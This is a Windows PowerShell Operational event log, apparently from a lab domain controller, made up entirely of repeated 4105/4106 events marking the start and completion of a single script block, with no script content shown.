06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471390
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471389
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471388
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471387
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471386
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471385
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471384
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471383
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471382
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471381
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471380
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471379
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471378
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471377
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471376
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471375
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471374
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471373
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471372
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471371
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471370
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471369
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471368
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471367
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471366
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471365
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471364
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471363
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471362
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471361
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471360
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471359
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471358
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471357
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471356
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471355
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471354
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471353
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471352
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471351
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471350
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471349
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471348
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471347
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471346
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471345
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471344
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471343
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471342
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471341
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471340
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471339
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471338
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471337
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471336
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
